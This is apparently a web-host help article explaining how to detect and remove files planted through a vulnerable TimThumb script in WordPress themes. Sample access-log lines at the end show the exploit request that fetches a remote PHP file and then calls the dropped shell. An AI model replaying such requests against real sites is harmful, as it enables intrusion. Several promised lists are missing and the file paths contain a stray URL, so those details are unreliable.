TimThumb is a tool used by WordPress themes and plugins to resize images. Old versions of TimThumb have a security vulnerability that lets attackers upload malicious ("bad") files from another website. The first bad file then lets the attacker upload more malicious files to the hosting account.
You can get more information about compromises and how to deal with them in My website was hacked. What should I do?.
Besides the signs mentioned in My website was hacked. What should I do?, you can tell your site has been affected by this specific compromise if your account contains the files with the following patterns in a plugin directory:
You can find examples of possible md5 hashes in the MD5SUMS of Known Malicious Files section of this article.
You might also find the following files in your website's root directory (more info):
You must remove all of the compromised and bad files. Before deleting anything, we recommend making a backup of your website (more info).
The bad files that are initially uploaded through the TimThumb vulnerability will typically be located in one of the following directories, which are located in the /theme
or /plugin
directory that contains the vulnerable TimThumb file.
Examples of bad files' locations:
[webroot]/wp-content/themes/[theme with vulnerable TimThumb]/cache/https://static.itegy.com/images/
Examples of bad files' names in these locations:
The files x.txt
and logx.txt
will contain information about when a bad file was created using the TimThumb vulnerability and the location of the bad file within the hosting account. This information is helpful in determining what files need to be removed and where to find them. However, it is not likely that this will provide a complete list of files that need to be removed.
An example:
After you've create a backup of your site, remove the following files:
You can do this via FTP (more info) or through the file manager within the control panel for your hosting account (more info).
You should also:
TimThumb.php
with the newest version found athere.x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/https://static.itegy.com/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/https://static.itegy.com/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/https://static.itegy.com/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"